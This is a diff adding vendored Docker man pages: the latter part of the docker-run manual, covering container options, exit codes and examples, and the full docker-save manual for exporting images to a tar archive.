+    PID    container    CPU    CPU share
+    100    {C0}         0      100% of CPU0
+    101    {C1}         1      100% of CPU1
+    102    {C1}         2      100% of CPU2
+
+**--cap-add**=[]
+   Add Linux capabilities
+
+**--cap-drop**=[]
+   Drop Linux capabilities
+
+**--cgroup-parent**=""
+   Path to cgroups under which the cgroup for the container will be created. If the path is not absolute, the path is considered to be relative to the cgroups path of the init process. Cgroups will be created if they do not already exist.
+
+**--cidfile**=""
+   Write the container ID to the file
+
+**--cpu-count**=*0*
+   Limit the number of CPUs available for execution by the container.
+
+   On Windows Server containers, this is approximated as a percentage of total CPU usage.
+
+   On Windows Server containers, the processor resource controls are mutually exclusive, the order of precedence is CPUCount first, then CPUShares, and CPUPercent last.
+
+**--cpu-percent**=*0*
+   Limit the percentage of CPU available for execution by a container running on a Windows daemon.
+
+   On Windows Server containers, the processor resource controls are mutually exclusive, the order of precedence is CPUCount first, then CPUShares, and CPUPercent last.
+
+**--cpu-period**=*0*
+   Limit the CPU CFS (Completely Fair Scheduler) period
+
+   Limit the container's CPU usage. This flag tells the kernel to restrict the container's CPU usage to the period you specify.
+
+**--cpuset-cpus**=""
+   CPUs in which to allow execution (0-3, 0,1)
+
+**--cpuset-mems**=""
+   Memory nodes (MEMs) in which to allow execution (0-3, 0,1).
Only effective on NUMA systems.
+
+   If you have four memory nodes on your system (0-3), use `--cpuset-mems=0,1`
+then processes in your Docker container will only use memory from the first
+two memory nodes.
+
+**--cpu-quota**=*0*
+   Limit the CPU CFS (Completely Fair Scheduler) quota
+
+   Limit the container's CPU usage. By default, containers run with the full
+CPU resource. This flag tells the kernel to restrict the container's CPU usage
+to the quota you specify.
+
+**--cpu-rt-period**=0
+   Limit the CPU real-time period in microseconds
+
+   Limit the container's Real Time CPU usage. This flag tells the kernel to restrict the container's Real Time CPU usage to the period you specify.
+
+**--cpu-rt-runtime**=0
+   Limit the CPU real-time runtime in microseconds
+
+   Limit the container's Real Time CPU usage. This flag tells the kernel to limit the amount of time in a given CPU period Real Time tasks may consume. Ex:
+   Period of 1,000,000us and Runtime of 950,000us means that this container could consume 95% of available CPU and leave the remaining 5% to normal priority tasks.
+
+   The sum of all runtimes across containers cannot exceed the amount allotted to the parent cgroup.
+
+**--cpus**=0.0
+   Number of CPUs. The default is *0.0* which means no limit.
+
+**-d**, **--detach**=*true*|*false*
+   Detached mode: run the container in the background and print the new container ID. The default is *false*.
+
+   At any time you can run **docker ps** in
+the other shell to view a list of the running containers. You can reattach to a
+detached container with **docker attach**. If you choose to run a container in
+the detached mode, then you cannot use the **--rm** option.
+
+   When attached in the tty mode, you can detach from the container (and leave it
+running) using a configurable key sequence. The default sequence is `CTRL-p CTRL-q`.
+You configure the key sequence using the **--detach-keys** option or a configuration file.
+See **config-json(5)** for documentation on using a configuration file.
+
+**--detach-keys**=""
+   Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-<value>` where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`.
+
+**--device**=[]
+   Add a host device to the container (e.g. --device=/dev/sdc:/dev/xvdc:rwm)
+
+**--device-read-bps**=[]
+   Limit read rate from a device (e.g. --device-read-bps=/dev/sda:1mb)
+
+**--device-read-iops**=[]
+   Limit read rate from a device (e.g. --device-read-iops=/dev/sda:1000)
+
+**--device-write-bps**=[]
+   Limit write rate to a device (e.g. --device-write-bps=/dev/sda:1mb)
+
+**--device-write-iops**=[]
+   Limit write rate to a device (e.g. --device-write-iops=/dev/sda:1000)
+
+**--dns-search**=[]
+   Set custom DNS search domains (Use --dns-search=. if you don't wish to set the search domain)
+
+**--dns-option**=[]
+   Set custom DNS options
+
+**--dns**=[]
+   Set custom DNS servers
+
+   This option can be used to override the DNS
+configuration passed to the container. Typically this is necessary when the
+host DNS configuration is invalid for the container (e.g., 127.0.0.1). When this
+is the case the **--dns** flag is necessary for every run.
+
+**-e**, **--env**=[]
+   Set environment variables
+
+   This option allows you to specify arbitrary
+environment variables that are available for the process that will be launched
+inside of the container.
+
+**--entrypoint**=""
+   Overwrite the default ENTRYPOINT of the image
+
+   This option allows you to overwrite the default entrypoint of the image that
+is set in the Dockerfile. The ENTRYPOINT of an image is similar to a COMMAND
+because it specifies what executable to run when the container starts, but it is
+(purposely) more difficult to override.
The ENTRYPOINT gives a container its +default nature or behavior, so that when you set an ENTRYPOINT you can run the +container as if it were that binary, complete with default options, and you can +pass in more options via the COMMAND. But, sometimes an operator may want to run +something else inside the container, so you can override the default ENTRYPOINT +at runtime by using a **--entrypoint** and a string to specify the new +ENTRYPOINT. + +**--env-file**=[] + Read in a line delimited file of environment variables + +**--expose**=[] + Expose a port, or a range of ports (e.g. --expose=3300-3310) informs Docker +that the container listens on the specified network ports at runtime. Docker +uses this information to interconnect containers using links and to set up port +redirection on the host system. + +**--group-add**=[] + Add additional groups to run as + +**-h**, **--hostname**="" + Container host name + + Sets the container host name that is available inside the container. + +**--help** + Print usage statement + +**--init** + Run an init inside the container that forwards signals and reaps processes + +**--init-path**="" + Path to the docker-init binary + +**-i**, **--interactive**=*true*|*false* + Keep STDIN open even if not attached. The default is *false*. + + When set to true, keep stdin open even if not attached. The default is false. + +**--ip**="" + Sets the container's interface IPv4 address (e.g. 172.23.0.9) + + It can only be used in conjunction with **--network** for user-defined networks + +**--ip6**="" + Sets the container's interface IPv6 address (e.g. 2001:db8::1b99) + + It can only be used in conjunction with **--network** for user-defined networks + +**--ipc**="" + Default is to create a private IPC namespace (POSIX SysV IPC) for the container + 'container:': reuses another container shared memory, semaphores and message queues + 'host': use the host shared memory,semaphores and message queues inside the container. 
Note: the host mode gives the container full access to local shared memory and is therefore considered insecure. + +**--isolation**="*default*" + Isolation specifies the type of isolation technology used by containers. Note +that the default on Windows server is `process`, and the default on Windows client +is `hyperv`. Linux only supports `default`. + +**-l**, **--label**=[] + Set metadata on the container (e.g., --label com.example.key=value) + +**--kernel-memory**="" + Kernel memory limit (format: `[]`, where unit = b, k, m or g) + + Constrains the kernel memory available to a container. If a limit of 0 +is specified (not using `--kernel-memory`), the container's kernel memory +is not limited. If you specify a limit, it may be rounded up to a multiple +of the operating system's page size and the value can be very large, +millions of trillions. + +**--label-file**=[] + Read in a line delimited file of labels + +**--link**=[] + Add link to another container in the form of :alias or just +in which case the alias will match the name + + If the operator +uses **--link** when starting the new client container, then the client +container can access the exposed port via a private networking interface. Docker +will set some environment variables in the client container to help indicate +which interface and port to use. + +**--link-local-ip**=[] + Add one or more link-local IPv4/IPv6 addresses to the container's interface + +**--log-driver**="*json-file*|*syslog*|*journald*|*gelf*|*fluentd*|*awslogs*|*splunk*|*etwlogs*|*gcplogs*|*none*" + Logging driver for the container. Default is defined by daemon `--log-driver` flag. + **Warning**: the `docker logs` command works only for the `json-file` and + `journald` logging drivers. + +**--log-opt**=[] + Logging driver specific options. + +**-m**, **--memory**="" + Memory limit (format: [], where unit = b, k, m or g) + + Allows you to constrain the memory available to a container. 
If the host +supports swap memory, then the **-m** memory setting can be larger than physical +RAM. If a limit of 0 is specified (not using **-m**), the container's memory is +not limited. The actual limit may be rounded up to a multiple of the operating +system's page size (the value would be very large, that's millions of trillions). + +**--memory-reservation**="" + Memory soft limit (format: [], where unit = b, k, m or g) + + After setting memory reservation, when the system detects memory contention +or low memory, containers are forced to restrict their consumption to their +reservation. So you should always set the value below **--memory**, otherwise the +hard limit will take precedence. By default, memory reservation will be the same +as memory limit. + +**--memory-swap**="LIMIT" + A limit value equal to memory plus swap. Must be used with the **-m** +(**--memory**) flag. The swap `LIMIT` should always be larger than **-m** +(**--memory**) value. By default, the swap `LIMIT` will be set to double +the value of --memory. + + The format of `LIMIT` is `[]`. Unit can be `b` (bytes), +`k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you don't specify a +unit, `b` is used. Set LIMIT to `-1` to enable unlimited swap. + +**--mac-address**="" + Container MAC address (e.g. 92:d0:c6:0a:29:33) + + Remember that the MAC address in an Ethernet network must be unique. +The IPv6 link-local address will be based on the device's MAC address +according to RFC4862. + +**--name**="" + Assign a name to the container + + The operator can identify a container in three ways: + UUID long identifier (“f78375b1c487e03c9438c729345e54db9d20cfa2ac1fc3494b6eb60872e74778”) + UUID short identifier (“f78375b1c487”) + Name (“jonah”) + + The UUID identifiers come from the Docker daemon, and if a name is not assigned +to the container with **--name** then the daemon will also generate a random +string name. 
The name is useful when defining links (see **--link**) (or any +other place you need to identify a container). This works for both background +and foreground Docker containers. + +**--network**="*bridge*" + Set the Network mode for the container + 'bridge': create a network stack on the default Docker bridge + 'none': no networking + 'container:': reuse another container's network stack + 'host': use the Docker host network stack. Note: the host mode gives the container full access to local system services such as D-bus and is therefore considered insecure. + '|': connect to a user-defined network + +**--network-alias**=[] + Add network-scoped alias for the container + +**--oom-kill-disable**=*true*|*false* + Whether to disable OOM Killer for the container or not. + +**--oom-score-adj**="" + Tune the host's OOM preferences for containers (accepts -1000 to 1000) + +**-P**, **--publish-all**=*true*|*false* + Publish all exposed ports to random ports on the host interfaces. The default is *false*. + + When set to true publish all exposed ports to the host interfaces. The +default is false. If the operator uses -P (or -p) then Docker will make the +exposed port accessible on the host and the ports will be available to any +client that can reach the host. When using -P, Docker will bind any exposed +port to a random port on the host within an *ephemeral port range* defined by +`/proc/sys/net/ipv4/ip_local_port_range`. To find the mapping between the host +ports and the exposed ports, use `docker port`. + +**-p**, **--publish**=[] + Publish a container's port, or range of ports, to the host. + + Format: `ip:hostPort:containerPort | ip::containerPort | hostPort:containerPort | containerPort` +Both hostPort and containerPort can be specified as a range of ports. +When specifying ranges for both, the number of container ports in the range must match the number of host ports in the range. 
+(e.g., `docker run -p 1234-1236:1222-1224 --name thisWorks -t busybox` +but not `docker run -p 1230-1236:1230-1240 --name RangeContainerPortsBiggerThanRangeHostPorts -t busybox`) +With ip: `docker run -p 127.0.0.1:$HOSTPORT:$CONTAINERPORT --name CONTAINER -t someimage` +Use `docker port` to see the actual mapping: `docker port CONTAINER $CONTAINERPORT` + +**--pid**="" + Set the PID mode for the container + Default is to create a private PID namespace for the container + 'container:': join another container's PID namespace + 'host': use the host's PID namespace for the container. Note: the host mode gives the container full access to local PID and is therefore considered insecure. + +**--userns**="" + Set the usernamespace mode for the container when `userns-remap` option is enabled. + **host**: use the host usernamespace and enable all privileged options (e.g., `pid=host` or `--privileged`). + +**--pids-limit**="" + Tune the container's pids limit. Set `-1` to have unlimited pids for the container. + +**--uts**=*host* + Set the UTS mode for the container + **host**: use the host's UTS namespace inside the container. + Note: the host mode gives the container access to changing the host's hostname and is therefore considered insecure. + +**--privileged**=*true*|*false* + Give extended privileges to this container. The default is *false*. + + By default, Docker containers are +“unprivileged” (=false) and cannot, for example, run a Docker daemon inside the +Docker container. This is because by default a container is not allowed to +access any devices. A “privileged” container is given access to all devices. + + When the operator executes **docker run --privileged**, Docker will enable access +to all devices on the host as well as set some configuration in AppArmor to +allow the container nearly all the same access to the host as processes running +outside of a container on the host. 
+ +**--read-only**=*true*|*false* + Mount the container's root filesystem as read only. + + By default a container will have its root filesystem writable allowing processes +to write files anywhere. By specifying the `--read-only` flag the container will have +its root filesystem mounted as read only prohibiting any writes. + +**--restart**="*no*" + Restart policy to apply when a container exits (no, on-failure[:max-retry], always, unless-stopped). + +**--rm**=*true*|*false* + Automatically remove the container when it exits. The default is *false*. + `--rm` flag can work together with `-d`, and auto-removal will be done on daemon side. Note that it's +incompatible with any restart policy other than `none`. + +**--security-opt**=[] + Security Options + + "label=user:USER" : Set the label user for the container + "label=role:ROLE" : Set the label role for the container + "label=type:TYPE" : Set the label type for the container + "label=level:LEVEL" : Set the label level for the container + "label=disable" : Turn off label confinement for the container + "no-new-privileges" : Disable container processes from gaining additional privileges + + "seccomp=unconfined" : Turn off seccomp confinement for the container + "seccomp=profile.json : White listed syscalls seccomp Json file to be used as a seccomp filter + + "apparmor=unconfined" : Turn off apparmor confinement for the container + "apparmor=your-profile" : Set the apparmor confinement profile for the container + +**--storage-opt**=[] + Storage driver options per container + + $ docker run -it --storage-opt size=120G fedora /bin/bash + + This (size) will allow to set the container rootfs size to 120G at creation time. + This option is only available for the `devicemapper`, `btrfs`, `overlay2` and `zfs` graph drivers. + For the `devicemapper`, `btrfs` and `zfs` storage drivers, user cannot pass a size less than the Default BaseFS Size. 
+ For the `overlay2` storage driver, the size option is only available if the backing fs is `xfs` and mounted with the `pquota` mount option.
+ Under these conditions, user can pass any size less than the backing fs size.
+
+**--stop-signal**=*SIGTERM*
+ Signal to stop a container. Default is SIGTERM.
+
+**--stop-timeout**=*10*
+ Timeout (in seconds) to stop a container. Default is 10.
+
+**--shm-size**=""
+ Size of `/dev/shm`. The format is `<number><unit>`.
+ `number` must be greater than `0`. Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), or `g` (gigabytes).
+ If you omit the unit, the system uses bytes. If you omit the size entirely, the system uses `64m`.
+
+**--sysctl**=SYSCTL
+ Configure namespaced kernel parameters at runtime
+
+ IPC Namespace - current sysctls allowed:
+
+ kernel.msgmax, kernel.msgmnb, kernel.msgmni, kernel.sem, kernel.shmall, kernel.shmmax, kernel.shmmni, kernel.shm_rmid_forced
+ Sysctls beginning with fs.mqueue.*
+
+ If you use the `--ipc=host` option these sysctls will not be allowed.
+
+ Network Namespace - current sysctls allowed:
+ Sysctls beginning with net.*
+
+ If you use the `--network=host` option these sysctls will not be allowed.
+
+**--sig-proxy**=*true*|*false*
+ Proxy received signals to the process (non-TTY mode only). SIGCHLD, SIGSTOP, and SIGKILL are not proxied. The default is *true*.
+
+**--memory-swappiness**=""
+ Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100.
+
+**-t**, **--tty**=*true*|*false*
+ Allocate a pseudo-TTY. The default is *false*.
+
+ When set to true Docker can allocate a pseudo-tty and attach to the standard
+input of any container. This can be used, for example, to run a throwaway
+interactive shell. The default is false.
+
+The **-t** option is incompatible with a redirection of the docker client
+standard input.
+
+**--tmpfs**=[] Create a tmpfs mount
+
+ Mount a temporary filesystem (`tmpfs`) mount into a container, for example:
+
+ $ docker run -d --tmpfs /tmp:rw,size=787448k,mode=1777 my_image
+
+ This command mounts a `tmpfs` at `/tmp` within the container. The supported mount
+options are the same as the Linux default `mount` flags. If you do not specify
+any options, the system uses the following options:
+`rw,noexec,nosuid,nodev,size=65536k`.
+
+**-u**, **--user**=""
+ Sets the username or UID used and optionally the groupname or GID for the specified command.
+
+ The following examples are all valid:
+ --user [user | user:group | uid | uid:gid | user:gid | uid:group ]
+
+ Without this argument the command will be run as root in the container.
+
+**--ulimit**=[]
+ Ulimit options
+
+**-v**|**--volume**[=*[[HOST-DIR:]CONTAINER-DIR[:OPTIONS]]*]
+ Create a bind mount. If you specify, ` -v /HOST-DIR:/CONTAINER-DIR`, Docker
+ bind mounts `/HOST-DIR` in the host to `/CONTAINER-DIR` in the Docker
+ container. If 'HOST-DIR' is omitted, Docker automatically creates the new
+ volume on the host. The `OPTIONS` are a comma delimited list and can be:
+
+ * [rw|ro]
+ * [z|Z]
+ * [`[r]shared`|`[r]slave`|`[r]private`]
+ * [nocopy]
+
+The `CONTAINER-DIR` must be an absolute path such as `/src/docs`. The `HOST-DIR`
+can be an absolute path or a `name` value. A `name` value must start with an
+alphanumeric character, followed by `a-z0-9`, `_` (underscore), `.` (period) or
+`-` (hyphen). An absolute path starts with a `/` (forward slash).
+
+If you supply a `HOST-DIR` that is an absolute path, Docker bind-mounts to the
+path you specify. If you supply a `name`, Docker creates a named volume by that
+`name`. For example, you can specify either `/foo` or `foo` for a `HOST-DIR`
+value. If you supply the `/foo` value, Docker creates a bind-mount. If you
+supply the `foo` specification, Docker creates a named volume.
+ +You can specify multiple **-v** options to mount one or more mounts to a +container. To use these same mounts in other containers, specify the +**--volumes-from** option also. + +You can add `:ro` or `:rw` suffix to a volume to mount it read-only or +read-write mode, respectively. By default, the volumes are mounted read-write. +See examples. + +Labeling systems like SELinux require that proper labels are placed on volume +content mounted into a container. Without a label, the security system might +prevent the processes running inside the container from using the content. By +default, Docker does not change the labels set by the OS. + +To change a label in the container context, you can add either of two suffixes +`:z` or `:Z` to the volume mount. These suffixes tell Docker to relabel file +objects on the shared volumes. The `z` option tells Docker that two containers +share the volume content. As a result, Docker labels the content with a shared +content label. Shared volume labels allow all containers to read/write content. +The `Z` option tells Docker to label the content with a private unshared label. +Only the current container can use a private volume. + +By default bind mounted volumes are `private`. That means any mounts done +inside container will not be visible on host and vice-a-versa. One can change +this behavior by specifying a volume mount propagation property. Making a +volume `shared` mounts done under that volume inside container will be +visible on host and vice-a-versa. Making a volume `slave` enables only one +way mount propagation and that is mounts done on host under that volume +will be visible inside container but not the other way around. + +To control mount propagation property of volume one can use `:[r]shared`, +`:[r]slave` or `:[r]private` propagation flag. Propagation property can +be specified only for bind mounted volumes and not for internal volumes or +named volumes. 
For mount propagation to work source mount point (mount point
+where source dir is mounted on) has to have right propagation properties. For
+shared volumes, source mount point has to be shared. And for slave volumes,
+source mount has to be either shared or slave.
+
+Use `df <source-dir>` to figure out the source mount and then use
+`findmnt -o TARGET,PROPAGATION <source-mount-dir>` to figure out propagation
+properties of source mount. If `findmnt` utility is not available, then one
+can look at mount entry for source mount point in `/proc/self/mountinfo`. Look
+at `optional fields` and see if any propagation properties are specified.
+`shared:X` means mount is `shared`, `master:X` means mount is `slave` and if
+nothing is there that means mount is `private`.
+
+To change propagation properties of a mount point use `mount` command. For
+example, if one wants to bind mount source directory `/foo` one can do
+`mount --bind /foo /foo` and `mount --make-private --make-shared /foo`. This
+will convert /foo into a `shared` mount point. Alternatively one can directly
+change propagation properties of source mount. Say `/` is source mount for
+`/foo`, then use `mount --make-shared /` to convert `/` into a `shared` mount.
+
+> **Note**:
+> When using systemd to manage the Docker daemon's start and stop, in the systemd
+> unit file there is an option to control mount propagation for the Docker daemon
+> itself, called `MountFlags`. The value of this setting may cause Docker to not
+> see mount propagation changes made on the mount point. For example, if this value
+> is `slave`, you may not be able to use the `shared` or `rshared` propagation on
+> a volume.
+
+To disable automatic copying of data from the container path to the volume, use
+the `nocopy` flag. The `nocopy` flag can be set on bind mounts and named volumes.
+
+**--volume-driver**=""
+ Container's volume driver. This driver creates volumes specified either from
+ a Dockerfile's `VOLUME` instruction or from the `docker run -v` flag.
+ See **docker-volume-create(1)** for full details. + +**--volumes-from**=[] + Mount volumes from the specified container(s) + + Mounts already mounted volumes from a source container onto another + container. You must supply the source's container-id. To share + a volume, use the **--volumes-from** option when running + the target container. You can share volumes even if the source container + is not running. + + By default, Docker mounts the volumes in the same mode (read-write or + read-only) as it is mounted in the source container. Optionally, you + can change this by suffixing the container-id with either the `:ro` or + `:rw ` keyword. + + If the location of the volume from the source container overlaps with + data residing on a target container, then the volume hides + that data on the target. + +**-w**, **--workdir**="" + Working directory inside the container + + The default working directory for +running binaries within a container is the root directory (/). The developer can +set a different default with the Dockerfile WORKDIR instruction. The operator +can override the working directory by using the **-w** option. + +# Exit Status + +The exit code from `docker run` gives information about why the container +failed to run or why it exited. When `docker run` exits with a non-zero code, +the exit codes follow the `chroot` standard, see below: + +**_125_** if the error is with Docker daemon **_itself_** + + $ docker run --foo busybox; echo $? + # flag provided but not defined: --foo + See 'docker run --help'. + 125 + +**_126_** if the **_contained command_** cannot be invoked + + $ docker run busybox /etc; echo $? + # exec: "/etc": permission denied + docker: Error response from daemon: Contained command could not be invoked + 126 + +**_127_** if the **_contained command_** cannot be found + + $ docker run busybox foo; echo $? 
+ # exec: "foo": executable file not found in $PATH + docker: Error response from daemon: Contained command not found or does not exist + 127 + +**_Exit code_** of **_contained command_** otherwise + + $ docker run busybox /bin/sh -c 'exit 3' + # 3 + +# EXAMPLES + +## Running container in read-only mode + +During container image development, containers often need to write to the image +content. Installing packages into /usr, for example. In production, +applications seldom need to write to the image. Container applications write +to volumes if they need to write to file systems at all. Applications can be +made more secure by running them in read-only mode using the --read-only switch. +This protects the containers image from modification. Read only containers may +still need to write temporary data. The best way to handle this is to mount +tmpfs directories on /run and /tmp. + + # docker run --read-only --tmpfs /run --tmpfs /tmp -i -t fedora /bin/bash + +## Exposing log messages from the container to the host's log + +If you want messages that are logged in your container to show up in the host's +syslog/journal then you should bind mount the /dev/log directory as follows. + + # docker run -v /dev/log:/dev/log -i -t fedora /bin/bash + +From inside the container you can test this by sending a message to the log. + + (bash)# logger "Hello from my container" + +Then exit and check the journal. + + # exit + + # journalctl -b | grep Hello + +This should list the message sent to logger. + +## Attaching to one or more from STDIN, STDOUT, STDERR + +If you do not specify -a then Docker will attach everything (stdin,stdout,stderr) +. 
You can specify to which of the three standard streams (stdin, stdout, stderr) +you'd like to connect instead, as in: + + # docker run -a stdin -a stdout -i -t fedora /bin/bash + +## Sharing IPC between containers + +Using shm_server.c available here: https://www.cs.cf.ac.uk/Dave/C/node27.html + +Testing `--ipc=host` mode: + +Host shows a shared memory segment with 7 pids attached, happens to be from httpd: + +``` + $ sudo ipcs -m + + ------ Shared Memory Segments -------- + key shmid owner perms bytes nattch status + 0x01128e25 0 root 600 1000 7 +``` + +Now run a regular container, and it correctly does NOT see the shared memory segment from the host: + +``` + $ docker run -it shm ipcs -m + + ------ Shared Memory Segments -------- + key shmid owner perms bytes nattch status +``` + +Run a container with the new `--ipc=host` option, and it now sees the shared memory segment from the host httpd: + + ``` + $ docker run -it --ipc=host shm ipcs -m + + ------ Shared Memory Segments -------- + key shmid owner perms bytes nattch status + 0x01128e25 0 root 600 1000 7 +``` +Testing `--ipc=container:CONTAINERID` mode: + +Start a container with a program to create a shared memory segment: +``` + $ docker run -it shm bash + $ sudo shm/shm_server & + $ sudo ipcs -m + + ------ Shared Memory Segments -------- + key shmid owner perms bytes nattch status + 0x0000162e 0 root 666 27 1 +``` +Create a 2nd container correctly shows no shared memory segment from 1st container: +``` + $ docker run shm ipcs -m + + ------ Shared Memory Segments -------- + key shmid owner perms bytes nattch status +``` + +Create a 3rd container using the new --ipc=container:CONTAINERID option, now it shows the shared memory segment from the first: + +``` + $ docker run -it --ipc=container:ed735b2264ac shm ipcs -m + $ sudo ipcs -m + + ------ Shared Memory Segments -------- + key shmid owner perms bytes nattch status + 0x0000162e 0 root 666 27 1 +``` + +## Linking Containers + +> **Note**: This section 
describes linking between containers on the +> default (bridge) network, also known as "legacy links". Using `--link` +> on user-defined networks uses the DNS-based discovery, which does not add +> entries to `/etc/hosts`, and does not set environment variables for +> discovery. + +The link feature allows multiple containers to communicate with each other. For +example, a container whose Dockerfile has exposed port 80 can be run and named +as follows: + + # docker run --name=link-test -d -i -t fedora/httpd + +A second container, in this case called linker, can communicate with the httpd +container, named link-test, by running with the **--link=:** + + # docker run -t -i --link=link-test:lt --name=linker fedora /bin/bash + +Now the container linker is linked to container link-test with the alias lt. +Running the **env** command in the linker container shows environment variables + with the LT (alias) context (**LT_**) + + # env + HOSTNAME=668231cb0978 + TERM=xterm + LT_PORT_80_TCP=tcp://172.17.0.3:80 + LT_PORT_80_TCP_PORT=80 + LT_PORT_80_TCP_PROTO=tcp + LT_PORT=tcp://172.17.0.3:80 + PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin + PWD=/ + LT_NAME=/linker/lt + SHLVL=1 + HOME=/ + LT_PORT_80_TCP_ADDR=172.17.0.3 + _=/usr/bin/env + +When linking two containers Docker will use the exposed ports of the container +to create a secure tunnel for the parent to access. + +If a container is connected to the default bridge network and `linked` +with other containers, then the container's `/etc/hosts` file is updated +with the linked container's name. + +> **Note** Since Docker may live update the container's `/etc/hosts` file, there +may be situations when processes inside the container can end up reading an +empty or incomplete `/etc/hosts` file. In most cases, retrying the read again +should fix the problem. + + +## Mapping Ports for External Usage + +The exposed port of an application can be mapped to a host port using the **-p** +flag. 
For example, an httpd port 80 can be mapped to the host port 8080 using the +following: + + # docker run -p 8080:80 -d -i -t fedora/httpd + +## Creating and Mounting a Data Volume Container + +Many applications require the sharing of persistent data across several +containers. Docker allows you to create a Data Volume Container that other +containers can mount from. For example, create a named container that contains +directories /var/volume1 and /tmp/volume2. The image will need to contain these +directories so a couple of RUN mkdir instructions might be required for you +fedora-data image: + + # docker run --name=data -v /var/volume1 -v /tmp/volume2 -i -t fedora-data true + # docker run --volumes-from=data --name=fedora-container1 -i -t fedora bash + +Multiple --volumes-from parameters will bring together multiple data volumes from +multiple containers. And it's possible to mount the volumes that came from the +DATA container in yet another container via the fedora-container1 intermediary +container, allowing to abstract the actual data source from users of that data: + + # docker run --volumes-from=fedora-container1 --name=fedora-container2 -i -t fedora bash + +## Mounting External Volumes + +To mount a host directory as a container volume, specify the absolute path to +the directory and the absolute path for the container directory separated by a +colon: + + # docker run -v /var/db:/data1 -i -t fedora bash + +When using SELinux, be aware that the host has no knowledge of container SELinux +policy. Therefore, in the above example, if SELinux policy is enforced, the +`/var/db` directory is not writable to the container. A "Permission Denied" +message will occur and an avc: message in the host's syslog. 
+ + +To work around this, at time of writing this man page, the following command +needs to be run in order for the proper SELinux policy type label to be attached +to the host directory: + + # chcon -Rt svirt_sandbox_file_t /var/db + + +Now, writing to the /data1 volume in the container will be allowed and the +changes will also be reflected on the host in /var/db. + +## Using alternative security labeling + +You can override the default labeling scheme for each container by specifying +the `--security-opt` flag. For example, you can specify the MCS/MLS level, a +requirement for MLS systems. Specifying the level in the following command +allows you to share the same content between containers. + + # docker run --security-opt label=level:s0:c100,c200 -i -t fedora bash + +An MLS example might be: + + # docker run --security-opt label=level:TopSecret -i -t rhel7 bash + +To disable the security labeling for this container versus running with the +`--permissive` flag, use the following command: + + # docker run --security-opt label=disable -i -t fedora bash + +If you want a tighter security policy on the processes within a container, +you can specify an alternate type for the container. You could run a container +that is only allowed to listen on Apache ports by executing the following +command: + + # docker run --security-opt label=type:svirt_apache_t -i -t centos bash + +Note: + +You would have to write policy defining a `svirt_apache_t` type. + +## Setting device weight + +If you want to set `/dev/sda` device weight to `200`, you can specify the device +weight by `--blkio-weight-device` flag. Use the following command: + + # docker run -it --blkio-weight-device "/dev/sda:200" ubuntu + +## Specify isolation technology for container (--isolation) + +This option is useful in situations where you are running Docker containers on +Microsoft Windows. The `--isolation ` option sets a container's isolation +technology. 
On Linux, the only supported is the `default` option which uses +Linux namespaces. These two commands are equivalent on Linux: + +``` +$ docker run -d busybox top +$ docker run -d --isolation default busybox top +``` + +On Microsoft Windows, can take any of these values: + +* `default`: Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value. +* `process`: Namespace isolation only. +* `hyperv`: Hyper-V hypervisor partition-based isolation. + +In practice, when running on Microsoft Windows without a `daemon` option set, these two commands are equivalent: + +``` +$ docker run -d --isolation default busybox top +$ docker run -d --isolation process busybox top +``` + +If you have set the `--exec-opt isolation=hyperv` option on the Docker `daemon`, any of these commands also result in `hyperv` isolation: + +``` +$ docker run -d --isolation default busybox top +$ docker run -d --isolation hyperv busybox top +``` + +## Setting Namespaced Kernel Parameters (Sysctls) + +The `--sysctl` sets namespaced kernel parameters (sysctls) in the +container. For example, to turn on IP forwarding in the containers +network namespace, run this command: + + $ docker run --sysctl net.ipv4.ip_forward=1 someimage + +Note: + +Not all sysctls are namespaced. Docker does not support changing sysctls +inside of a container that also modify the host system. As the kernel +evolves we expect to see more sysctls become namespaced. + +See the definition of the `--sysctl` option above for the current list of +supported sysctls. + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. 
+June 2014, updated by Sven Dowideit +July 2014, updated by Sven Dowideit +November 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-save.1.md b/vendor/github.com/docker/docker/man/docker-save.1.md new file mode 100644 index 0000000000..1d1de8a1df --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-save.1.md @@ -0,0 +1,45 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-save - Save one or more images to a tar archive (streamed to STDOUT by default) + +# SYNOPSIS +**docker save** +[**--help**] +[**-o**|**--output**[=*OUTPUT*]] +IMAGE [IMAGE...] + +# DESCRIPTION +Produces a tarred repository to the standard output stream. Contains all +parent layers, and all tags + versions, or specified repo:tag. + +Stream to a file instead of STDOUT by using **-o**. + +# OPTIONS +**--help** + Print usage statement + +**-o**, **--output**="" + Write to a file, instead of STDOUT + +# EXAMPLES + +Save all fedora repository images to a fedora-all.tar and save the latest +fedora image to a fedora-latest.tar: + + $ docker save fedora > fedora-all.tar + $ docker save --output=fedora-latest.tar fedora:latest + $ ls -sh fedora-all.tar + 721M fedora-all.tar + $ ls -sh fedora-latest.tar + 367M fedora-latest.tar + +# See also +**docker-load(1)** to load an image from a tar archive on STDIN. + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. 
